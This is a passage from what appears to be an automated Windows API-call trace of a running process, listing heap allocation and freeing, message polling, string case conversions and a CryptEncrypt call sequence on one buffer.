hHeap=0x25c0000) returned 1 [0190.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0190.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0190.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0190.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0190.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34bf508 | out: hHeap=0x25c0000) returned 1 [0190.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0190.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0190.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.120] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0190.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0190.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.121] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xd2af, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xd2b0) returned 1 [0190.121] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.122] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.122] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.122] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.122] CharLowerBuffW (in: lpsz="byte[53936]", cchLength=0xb | out: lpsz="byte[53936]") returned 0xb [0190.122] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.124] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.124] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.124] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.124] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.124] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.125] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.125] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34bf508*, pdwDataLen=0x8bef68*=0xd2af, dwBufLen=0xd2b0 | out: pbData=0x34bf508*, pdwDataLen=0x8bef68*=0xd2b0) returned 1 [0190.126] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.126] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.126] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.126] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.127] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.127] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.127] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.127] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0190.127] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.127] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0190.127] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.127] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.127] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0190.127] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.127] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0190.128] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.128] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.128] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.128] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.128] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.128] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.128] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.128] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.128] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.128] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.128] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.128] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.133] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.133] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.133] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.136] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.136] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.137] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0190.137] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.137] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0190.137] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.137] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.137] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.137] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0190.137] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.137] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0190.137] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0190.137] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.137] CryptDestroyKey (hKey=0xaa58e0) returned 1 [0190.137] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.137] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.137] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0190.138] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.138] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0190.138] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.138] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.138] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0190.138] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.138] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0190.138] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.138] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.138] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.138] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.145] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.145] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0190.145] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.145] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0190.145] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0190.145] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.145] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.146] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.146] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.146] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.146] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0190.146] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.146] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0190.146] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.146] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.146] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0190.146] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.146] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0190.146] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.146] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.146] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.146] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.146] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.146] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.147] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.147] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.147] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.147] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.147] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.147] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.147] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.147] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.147] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.147] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0190.147] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.147] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0190.147] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.147] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.147] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.147] CryptReleaseContext (hProv=0xaa3868, dwFlags=0x0) returned 1 [0190.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa628 [0190.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0190.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0190.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0190.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0190.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0190.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0190.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0190.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0190.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0190.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0190.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0190.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0190.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0190.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0190.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0190.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0190.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0190.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.149] HeapFree (in: hHeap=0x25c0000, 